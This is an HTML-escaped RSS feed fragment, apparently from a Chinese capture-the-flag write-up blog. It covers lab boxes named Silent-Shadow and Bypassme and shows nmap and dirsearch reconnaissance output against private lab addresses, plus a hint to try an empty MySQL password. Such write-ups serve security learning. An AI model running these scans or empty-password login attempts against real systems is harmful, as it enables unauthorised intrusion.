&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;protocol 2.0&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; ssh-hostkey: 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;   &lt;span class=&#34;m&#34;&gt;3072&lt;/span&gt; f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;RSA&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;   &lt;span class=&#34;m&#34;&gt;256&lt;/span&gt; bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;ECDSA&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_  &lt;span class=&#34;m&#34;&gt;256&lt;/span&gt; 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;ED25519&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;80/tcp open  http    Apache httpd 2.4.62 &lt;span class=&#34;o&#34;&gt;((&lt;/span&gt;Debian&lt;span class=&#34;o&#34;&gt;))&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_http-title: cyber fortress &lt;span class=&#34;m&#34;&gt;9000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_http-server-header: Apache/2.4.62 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Debian&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id=&#34;dirsearch&#34;&gt;Dirsearch&lt;/h2&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;root@kali&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; /home/kali/Umz  
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;❯ dirsearch -u http://192.168.55.73                                      
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;  _&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;. _ _  _  _  _ _&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_    v0.4.3                                                                                                                
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt; &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;_&lt;span class=&#34;o&#34;&gt;||&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; _&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;/_&lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;_&lt;span class=&#34;o&#34;&gt;||&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;_&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;                                                                                                                         
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;                                                                                                                                                
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Extensions: php, asp, aspx, jsp, html, htm &lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; HTTP method: GET &lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; Threads: &lt;span class=&#34;m&#34;&gt;25&lt;/span&gt; &lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; Wordlist size: &lt;span class=&#34;m&#34;&gt;12289&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Target: http://192.168.55.73/
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;02:39:29&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Scanning:                                                                                                                            
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;02:39:30&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;403&lt;/span&gt; -   278B - /.php                                             
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;02:39:38&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;200&lt;/span&gt; -    3KB - /index.html                                       
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;02:39:38&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;200&lt;/span&gt; -    3KB - /index.php                                        
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;02:39:38&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;200&lt;/span&gt; -    3KB - /index.php/login/                                 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;02:39:43&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;403&lt;/span&gt; -   278B - /server-status/                                   
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;02:39:43&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;403&lt;/span&gt; -   278B - /server-status
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;                                                                             
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Task Completed                     
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id=&#34;request-flood&#34;&gt;Request Flood&lt;/h2&gt;
&lt;p&gt;来到&lt;code&gt;index.php&lt;/code&gt;，可以看到过多请求会触发某种机制&lt;/p&gt;</description>
    </item>
    <item>
      <title>Thehackerslabs-Hexthink-Silent-Shadow</title>
      <link>https://www.hyhforever.top/posts/2025/06/thehackerslabs-hexthink-silent-shadow/</link>
      <pubDate>Wed, 04 Jun 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/06/thehackerslabs-hexthink-silent-shadow/</guid>
      <description>&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;root@kali&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; /home/kali/hexthink-silent-shadow  
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;❯ nmap 192.168.55.67 -sV -A -p-                                                                                                            
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;PORT     STATE SERVICE     VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;22/tcp   open  ssh         OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Ubuntu Linux&lt;span class=&#34;p&#34;&gt;;&lt;/span&gt; protocol 2.0&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; ssh-hostkey: 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;   &lt;span class=&#34;m&#34;&gt;256&lt;/span&gt; 4d:6e:39:a4:15:86:88:70:c7:9d:09:91:a3:0b:18:8c &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;ECDSA&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_  &lt;span class=&#34;m&#34;&gt;256&lt;/span&gt; f9:21:5d:25:ee:76:05:db:01:3b:45:c9:68:b0:82:9f &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;ED25519&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;80/tcp   open  http        Apache httpd 2.4.58 &lt;span class=&#34;o&#34;&gt;((&lt;/span&gt;Ubuntu&lt;span class=&#34;o&#34;&gt;))&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_http-title: Site doesn&lt;span class=&#34;err&#34;&gt;&amp;#39;&lt;/span&gt;t have a title &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;text/html&lt;span class=&#34;p&#34;&gt;;&lt;/span&gt; &lt;span class=&#34;nv&#34;&gt;charset&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;=&lt;/span&gt;UTF-8&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;.
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_http-server-header: Apache/2.4.58 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Ubuntu&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;3306/tcp open  mysql       MariaDB 5.5.5-10.11.11
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; mysql-info: 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;   Protocol: &lt;span class=&#34;m&#34;&gt;10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;   Version: 5.5.5-10.11.11-MariaDB-0ubuntu0.24.04.2
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;   Thread ID: &lt;span class=&#34;m&#34;&gt;34&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;   Capabilities flags: &lt;span class=&#34;m&#34;&gt;63486&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;   Some Capabilities: LongColumnFlag, Support41Auth, Speaks41ProtocolOld, SupportsCompression, IgnoreSigpipes, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, InteractiveClient, FoundRows, ODBCClient, ConnectWithDatabase, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, SupportsTransactions, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;   Status: Autocommit
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;   Salt: wPg7y~-c,O&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;~bPI&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt;yfu:
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_  Auth Plugin Name: mysql_native_password
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;9090/tcp open  zeus-admin?
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; fingerprint-strings: 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, SqueezeCenter_CLI, TLSSessionReq, TerminalServerCookie, WMSRequest, X11Probe, drda, ibm-db2-das, informix: 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_    Protocolo incorrecto. Esto no es HTTP.
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id=&#34;mysql&#34;&gt;Mysql&lt;/h2&gt;
&lt;p&gt;进入到&lt;code&gt;80&lt;/code&gt;端口的&lt;code&gt;index.php&lt;/code&gt;，查看到存在&lt;code&gt;ctf_user&lt;/code&gt;用户，可以使用密码登录，尝试使用空密码登录呢&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-Bypassme</title>
      <link>https://www.hyhforever.top/posts/2025/05/dockerlabs-bypassme/</link>
      <pubDate>Sat, 31 May 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/05/dockerlabs-bypassme/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Difficulty&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Linux&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;root@kali&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; /home/kali/bypassme  
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;❯ nmap 172.17.0.2 -sV -A -p- 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;PORT   STATE SERVICE VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Ubuntu Linux&lt;span class=&#34;p&#34;&gt;;&lt;/span&gt; protocol 2.0&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; ssh-hostkey: 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;   &lt;span class=&#34;m&#34;&gt;256&lt;/span&gt; b4:a8:42:e7:2b:2f:7a:f9:50:bd:6d:31:8e:36:54:7b &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;ECDSA&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_  &lt;span class=&#34;m&#34;&gt;256&lt;/span&gt; c0:ff:28:31:a3:0b:1a:3d:c3:5f:83:1b:3c:44:28:32 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;ED25519&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;80/tcp open  http    Apache httpd 2.4.58 &lt;span class=&#34;o&#34;&gt;((&lt;/span&gt;Ubuntu&lt;span class=&#34;o&#34;&gt;))&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; http-cookie-flags: 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;   /: 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;     PHPSESSID: 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_      httponly flag not &lt;span class=&#34;nb&#34;&gt;set&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; http-title: Login Panel
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_Requested resource was login.php
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_http-server-header: Apache/2.4.58 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Ubuntu&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id=&#34;dirsearch&#34;&gt;Dirsearch&lt;/h2&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-shell&#34; data-lang=&#34;shell&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;root@kali&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; /home/kali/bypassme  
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;❯ dirsearch -u 172.17.0.2                     
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;  _&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;. _ _  _  _  _ _&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_    v0.4.3                                                                                                                
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt; &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;_&lt;span class=&#34;o&#34;&gt;||&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; _&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;/_&lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;_&lt;span class=&#34;o&#34;&gt;||&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;_&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;                                                                                                                         
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;                                                                                                                                                
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Extensions: php, asp, aspx, jsp, html, htm &lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; HTTP method: GET &lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; Threads: &lt;span class=&#34;m&#34;&gt;25&lt;/span&gt; &lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; Wordlist size: &lt;span class=&#34;m&#34;&gt;12289&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Target: http://172.17.0.2/
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;10:03:10&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Scanning:                                                                                                                            
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;10:03:11&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;403&lt;/span&gt; -   275B - /.php                                             
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;10:03:18&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;302&lt;/span&gt; -     0B - /index.php  -&amp;gt;  login.php                         
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;10:03:18&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;302&lt;/span&gt; -     0B - /index.php/login/  -&amp;gt;  login.php                  
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;10:03:18&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;200&lt;/span&gt; -    2KB - /login.php                                        
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;10:03:18&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;403&lt;/span&gt; -   275B - /logs                                             
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;10:03:18&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;403&lt;/span&gt; -   275B - /logs/access_log                                  
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;10:03:18&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;403&lt;/span&gt; -   275B - /logs/                                            
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;10:03:18&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;403&lt;/span&gt; -   275B - /logs/access.log                                  
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;10:03:18&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;403&lt;/span&gt; -   275B - /logs/error.log
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;10:03:18&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;403&lt;/span&gt; -   275B - /logs/error_log
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;10:03:18&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;403&lt;/span&gt; -   275B - /logs/liferay.log
